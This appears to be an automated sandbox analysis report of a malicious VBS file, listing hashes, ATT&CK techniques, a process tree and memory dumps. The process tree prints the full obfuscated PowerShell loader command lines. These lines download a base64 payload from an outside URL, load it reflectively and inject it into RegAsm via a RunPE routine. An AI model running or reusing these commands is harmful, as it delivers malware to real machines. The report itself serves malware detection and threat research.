dfa4dfcb2b8bd8a2f352199a49be86bd7e6440302405b68b11062c25a1c87487

General

Target

dfa4dfcb2b8bd8a2f352199a49be86bd7e6440302405b68b11062c25a1c87487.vbs
Size

222KB
MD5

7d6554c8a85d866a962910ea6b1adbd8
SHA1

5c8e17d5320c9354d13b570868bd91919c41e61a
SHA256

dfa4dfcb2b8bd8a2f352199a49be86bd7e6440302405b68b11062c25a1c87487
SHA512

a120f0d53897fece88fc7568cd22766129d3abdd8d4874be4e6cc47e6073e6857880fa5585fc0f6e1feaa63be7c916cec116658d0eea6d7af35328d9b0983f3d
SSDEEP

3072:hksPms6UUTGkotx6yZQVkMojZKKqmXjszj9QqNyyJxYgt5p2b+GwUWibS71Syc4F:hl3yeH0kMUqmXej9VJZPS9TNfrJL0

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2760	powershell.exe
6	2760	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2744	powershell.exe
2760	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2744	powershell.exe
2760	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2744	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2880 wrote to memory of 2744	2880	WScript.exe	30
PID 2880 wrote to memory of 2744	2880	WScript.exe	30
PID 2880 wrote to memory of 2744	2880	WScript.exe	30
PID 2744 wrote to memory of 2760	2744	powershell.exe	32
PID 2744 wrote to memory of 2760	2744	powershell.exe	32
PID 2744 wrote to memory of 2760	2744	powershell.exe	32

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dfa4dfcb2b8bd8a2f352199a49be86bd7e6440302405b68b11062c25a1c87487.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnRCcrJ08nKydUJysndXJsICcrJz0gTjk2JysnaHR0cHM6Ly9pYScrJzYwMDEnKycwMCcrJy51cy5hJysncicrJ2NoaScrJ3YnKydlLm8nKydyZy8yNC9pJysndGUnKydtcy8nKydkJysnZXRhJysnaCcrJy1ub3RlLXYvJysnRGV0YScrJ2hOb3RlVi50JysneHROOTY7RE9UJysnYmFzJysnZTY0Q28nKydudGVudCA9JysnIChOJysnZXctT2JqZScrJ2MnKyd0IFN5Jysnc3RlbS5OZXQuV2ViJysnQycrJ2xpJysnZW50KS5EJysnbycrJ3cnKydubG9hZFMnKyd0cmknKyduJysnZycrJyhETycrJ1R1cicrJ2wnKycpJysnO0RPVGJpbicrJ2FyeUNvbnRlbnQgPScrJyBbU3lzdGVtLkNvJysnbicrJ3ZlJysncnRdOjpGJysncm9tQicrJ2FzZTY0JysnUycrJ3RyaW5nJysnKCcrJ0RPJysnVGJhcycrJ2U2NEMnKydvbnQnKydlbicrJ3QpO0QnKydPJysnVGEnKydzcycrJ2VtYicrJ2x5ID0nKycgJysnW1JlZmxlY3RpbycrJ24nKycuQXNzZW1iJysnbHldOjpMJysnbycrJ2FkKCcrJ0RPVGJpJysnbmFyeScrJ0NvbnRlbnQpJysnO0RPVHR5cGUgPSAnKydETycrJ1Rhc3NlJysnbScrJ2JseS5HZScrJ3RUeScrJ3BlKE4nKyc5JysnNlInKyd1bicrJ1BFLkgnKydvbWVOOScrJzYpJysnO0RPVCcrJ20nKydldGhvJysnZCA9ICcrJ0RPVHQnKyd5JysncGUnKycuJysnR2UnKyd0TWV0JysnaCcrJ29kKE45NicrJ1ZBSU4nKyc5NicrJyknKyc7JysnRE9UbWV0JysnaG9kJysnLkknKydudicrJ29rJysnZShETycrJ1QnKyduJysndWwnKydsJysnLCcrJyBbb2InKydqZWN0JysnW11dQChOJysnOTZ0eHQuT0VOSU4nKycvJysnMCcrJzQzLzInKyc2LjknKycxJysnLicrJzYnKyczMi4yNycrJzEvLzpwdHRoTjknKyc2ICwgJysnTjknKyc2ZCcrJ2VzYXRpdmFkJysnb045NiAsIE4nKyc5NmRlc2EnKyd0aScrJ3ZhJysnZG8nKydOJysnOTYgLCBOOScrJzZkZXNhdGknKyd2YScrJ2QnKydvTjknKyc2LE45NlJlZ0FzJysnbScrJ045NixOOTZOOTYpKScpLUNSZXBsQUNlKFtjSEFyXTc4K1tjSEFyXTU3K1tjSEFyXTU0KSxbY0hBcl0zOSAtckVwbEFjRSdET1QnLFtjSEFyXTM2KXxpblZva2UtZXhwcmVTU0lvbg==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('D'+'O'+'T'+'url '+'= N96'+'https://ia'+'6001'+'00'+'.us.a'+'r'+'chi'+'v'+'e.o'+'rg/24/i'+'te'+'ms/'+'d'+'eta'+'h'+'-note-v/'+'Deta'+'hNoteV.t'+'xtN96;DOT'+'bas'+'e64Co'+'ntent ='+' (N'+'ew-Obje'+'c'+'t Sy'+'stem.Net.Web'+'C'+'li'+'ent).D'+'o'+'w'+'nloadS'+'tri'+'n'+'g'+'(DO'+'Tur'+'l'+')'+';DOTbin'+'aryContent ='+' [System.Co'+'n'+'ve'+'rt]::F'+'romB'+'ase64'+'S'+'tring'+'('+'DO'+'Tbas'+'e64C'+'ont'+'en'+'t);D'+'O'+'Ta'+'ss'+'emb'+'ly ='+' '+'[Reflectio'+'n'+'.Assemb'+'ly]::L'+'o'+'ad('+'DOTbi'+'nary'+'Content)'+';DOTtype = '+'DO'+'Tasse'+'m'+'bly.Ge'+'tTy'+'pe(N'+'9'+'6R'+'un'+'PE.H'+'omeN9'+'6)'+';DOT'+'m'+'etho'+'d = '+'DOTt'+'y'+'pe'+'.'+'Ge'+'tMet'+'h'+'od(N96'+'VAIN'+'96'+')'+';'+'DOTmet'+'hod'+'.I'+'nv'+'ok'+'e(DO'+'T'+'n'+'ul'+'l'+','+' [ob'+'ject'+'[]]@(N'+'96txt.OENIN'+'/'+'0'+'43/2'+'6.9'+'1'+'.'+'6'+'32.27'+'1//:ptthN9'+'6 , '+'N9'+'6d'+'esativad'+'oN96 , N'+'96desa'+'ti'+'va'+'do'+'N'+'96 , N9'+'6desati'+'va'+'d'+'oN9'+'6,N96RegAs'+'m'+'N96,N96N96))')-CReplACe([cHAr]78+[cHAr]57+[cHAr]54),[cHAr]39 -rEplAcE'DOT',[cHAr]36)|inVoke-expreSSIon"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2dcc61a374277d68ac1043ce388a6f4f

SHA1
b6d01550fdd86bf85efff6edcab428a21397fa75

SHA256
ff5792c6534cd430ab77d4e3fbb9a04e46ed4fb0347520f7d0e5731adf5675e6

SHA512
cad497be860cf1d5ecf70109307286beda7f62bfec99f8de19ba306c2ad5805a005e322a80ab25f3c0cb6dde4085d13d8935f55d61d4718a5e3a7d9ab4185e93

Download Submit
memory/2744-4-0x000007FEF575E000-0x000007FEF575F000-memory.dmp

Filesize
4KB

Download
memory/2744-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/2744-6-0x0000000002910000-0x0000000002918000-memory.dmp

Filesize
32KB

Download
memory/2744-7-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-8-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-10-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-11-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-9-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

Filesize
9.6MB

Download
memory/2744-17-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing